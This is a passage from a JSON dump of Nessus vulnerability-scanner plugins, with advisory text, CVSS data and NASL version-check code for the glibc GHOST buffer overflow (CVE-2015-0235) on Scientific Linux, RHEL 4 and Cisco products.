script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:nx-os\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_nxos_version.nasl\");\n script_require_keys(\"Host/Cisco/NX-OS/Version\", \"Host/Cisco/NX-OS/Device\", \"Host/Cisco/NX-OS/Model\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\ninclude(\"cisco_kb_cmd_func.inc\");\n\ndevice = get_kb_item_or_exit(\"Host/Cisco/NX-OS/Device\");\nversion = get_kb_item_or_exit(\"Host/Cisco/NX-OS/Version\");\nmodel = get_kb_item_or_exit(\"Host/Cisco/NX-OS/Model\");\n\nif (device != 'Nexus') audit(AUDIT_HOST_NOT, 'a Cisco Nexus device');\n\nbug = NULL;\nfix = NULL;\nvuln = FALSE;\nn7k = FALSE; # Used to distinguish Nexus 7000 Series models in version comparison\n\n# Cisco Nexus 1000V\nif (model =~ \"^1000[vV]$\")\n{\n bug = \"CSCus71708\";\n fix = \"5.2(1)SV3(1.4)\";\n}\n# Cisco Nexus 3000\nelse if (model =~ \"^3[0-9][0-9][0-9]([^0-9]|$)\")\n{\n bug = \"CSCus68770\";\n if (version =~ \"^6\\.0\\(2\\)A\")\n fix = \"6.0(2)A4(3.41)\";\n else if (version =~ \"^6\\.0\\(2\\)U\")\n fix = \"6.0(2)U4(3.41)\";\n}\n# Cisco Nexus 4000\nelse if (model =~ \"^4[0-9][0-9][0-9]([^0-9]|$)\" && version =~ \"^4\\.1([^0-9])\")\n{\n bug = \"CSCus69648\";\n fix = \"4.1(2)E1(1o)\";\n}\n# Cisco Nexus 5000 and Cisco Nexus 2000\nelse if (model =~ \"^5[0-9][0-9][0-9]([^0-9]|$)\" || model =~ \"^2[0-9][0-9][0-9]([^0-9]|$)\")\n{\n bug = \"CSCus68591\";\n if (version =~ \"^5\\.\") fix = \"5.2(1).N1(9)\";\n else if (version =~ \"^6\\.\") fix = \"6.0(2).N2(7)\";\n else if (version =~ \"^7\\.0\\(\") fix = \"7.0(6).N1(1)\";\n else if (version =~ \"^7\\.1\\(\") fix = \"7.1(1)N1(1)\";\n else fix = NULL;\n}\n# Cisco Nexus 7000\nelse if (model =~ \"^7[0-9][0-9][0-9]([^0-9]|$)\")\n{\n n7k = TRUE;\n bug = \"CSCus68892\";\n fix = \"6.2(12)\";\n if (\n # All versions in releases 4 and 5 affected\n version =~ \"^[45]\\.\" ||\n # All versions in 6.0 and 6.1 affected\n version =~ \"^6\\.[0-1]([^0-9]|$)\" ||\n # Versions 6.2 < 6.2(12) affected\n version =~ \"^6\\.2$\" || version =~ \"^6\\.2\\(([0-9]|1[01])\\)\"\n ) vuln = TRUE;\n}\nelse audit(AUDIT_HOST_NOT, \"an affected Cisco Nexus model\");\n\nif (!n7k && !isnull(fix) && cisco_gen_ver_compare(a:version, b:fix) < 0) vuln = TRUE;\n\nif (vuln)\n{\n report =\n '\\n Cisco bug ID : ' + bug +\n '\\n Installed release : ' + version +\n '\\n Fixed release : ' + fix +\n '\\n';\n security_report_v4(port:0, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Cisco NX-OS software\", version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:10", "description": "A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : glibc on SL5.x i386/x86_64 (20150127) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:glibc", "p-cpe:/a:fermilab:scientific_linux:glibc-common", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common", "p-cpe:/a:fermilab:scientific_linux:glibc-devel", "p-cpe:/a:fermilab:scientific_linux:glibc-headers", "p-cpe:/a:fermilab:scientific_linux:glibc-utils", "p-cpe:/a:fermilab:scientific_linux:nscd", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20150127_GLIBC_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/81037", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81037);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on SL5.x i386/x86_64 (20150127) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1501&L=scientific-linux-errata&T=0&P=2696\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?74b43985\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"glibc-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-common-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-debuginfo-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-debuginfo-common-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-devel-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-headers-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-utils-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"nscd-2.5-123.el5_11.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:46:33", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 4 Extended Life Cycle Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2015-01-30T00:00:00", "type": "nessus", "title": "RHEL 4 : glibc (RHSA-2015:0101) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-02-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-profile", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:nptl-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:4"], "id": "REDHAT-RHSA-2015-0101.NASL", "href": "https://www.tenable.com/plugins/nessus/81104", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0101. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81104);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"RHSA\", value:\"2015:0101\");\n\n script_name(english:\"RHEL 4 : glibc (RHSA-2015:0101) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 4 Extended Life Cycle Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0101\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nptl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0101\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"glibc-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"glibc-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"glibc-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"glibc-common-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"glibc-common-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"glibc-devel-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"glibc-devel-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"glibc-headers-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"glibc-headers-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"glibc-profile-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"glibc-profile-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"glibc-utils-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"glibc-utils-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"nptl-devel-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"nptl-devel-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"nptl-devel-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"nscd-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"nscd-2.3.4-2.57.el4.2\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-profile / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:59:40", "description": "According to its self-reported version, the Cisco Unified Communications Manager IM and Presence Server Service is affected by a heap-based buffer overflow condition in the GNU C Library (glibc) due to improper validation of user-supplied input to the glibc functions\n__nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2().\nThis allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.", "cvss3": {}, "published": "2015-08-17T00:00:00", "type": "nessus", "title": "Cisco Unified Communications Manager IM and Presence GNU C Library (glibc) Buffer Overflow (CSCus69785) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:unified_communications_manager_im_and_presence_service", "cpe:/a:cisco:unified_communications_manager", "cpe:/a:cisco:unified_presence_server"], "id": "CISCO_CUPS_CSCUS69785.NASL", "href": "https://www.tenable.com/plugins/nessus/85449", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85449);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus69785\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Cisco Unified Communications Manager IM and Presence GNU C Library (glibc) Buffer Overflow (CSCus69785) (GHOST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Unified\nCommunications Manager IM and Presence Server Service is affected by a\nheap-based buffer overflow condition in the GNU C Library (glibc) due\nto improper validation of user-supplied input to the glibc functions\n__nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2().\nThis allows a remote attacker to cause a buffer overflow, resulting in\na denial of service condition or the execution of arbitrary code.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus69785\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in the Cisco bug ID CSCus69785.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager_im_and_presence_service\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_presence_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"cisco_unified_detect.nasl\");\n script_require_ports(\"Host/UCOS/Cisco Unified Presence/version\", \"cisco_cups/system_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\n\n# Leverage SSH version first\ndisplay_version = get_kb_item(\"cisco_cups/system_version\");\nver = display_version;\n# Fall back to API\nif (isnull(display_version))\n{\n display_version = get_kb_item_or_exit('Host/UCOS/Cisco Unified Presence/version');\n match = eregmatch(string:display_version, pattern:\"^(\\d+\\.\\d+\\.\\d+\\.\\d+-\\d+)($|[^0-9])\");\n if (isnull(match)) \n audit(AUDIT_VER_FORMAT, display_version); \n ver = match[1];\n}\n\nver = str_replace(string:ver, find:\"-\", replace:\".\");\n# 7.0 - 11.0 (11 not yet released)\nif(ver_compare(ver:ver, fix:\"7.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:ver, fix:\"8.6.5.15900.3\", strict:FALSE) < 0)\n fixed_ver = \"8.6.5 SU5 (8.6.5.15900-3)\";\nelse if(ver =~ \"^9\\.\" && ver_compare(ver:ver, fix:\"9.1.1.71900.2\", strict:FALSE) < 0)\n fixed_ver = \"9.1.1 SU5 (9.1.1.71900-2)\";\nelse if(ver =~ \"^10\\.[0-4]\\.\")\n fixed_ver = \"10.5.1 SU3 (10.5.1.13900-2)\"; # Any version of 10 prior to 10.5 go to 10.5.1\nelse if(ver =~ \"^10\\.5\\.1\\.\" && ver_compare(ver:ver, fix:\"10.5.1.13900.2\", strict:FALSE) < 0)\n fixed_ver = \"10.5.1 SU3 (10.5.1.13900-2)\";\nelse if(ver =~ \"^10\\.5\\.2\\.\" && ver_compare(ver:ver, fix:\"10.5.2.21900.2\", strict:FALSE) < 0)\n fixed_ver = \"10.5.2b (10.5.2.21900-2)\";\nelse if(ver =~ \"^11\\.0\\.\" && ver_compare(ver:ver, fix:\"11.0.1.10000.6\", strict:FALSE) < 0)\n fixed_ver = \"11.0.1.10000-6\";\nelse\n audit(AUDIT_INST_VER_NOT_VULN, \"CUCM IM and Presence Service\", display_version);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Installed version : ' + display_version +\n '\\n Fixed version : ' + fixed_ver +\n '\\n';\n security_hole(port:0, extra:report);\n}\nelse security_hole(0);\n", "cvss": 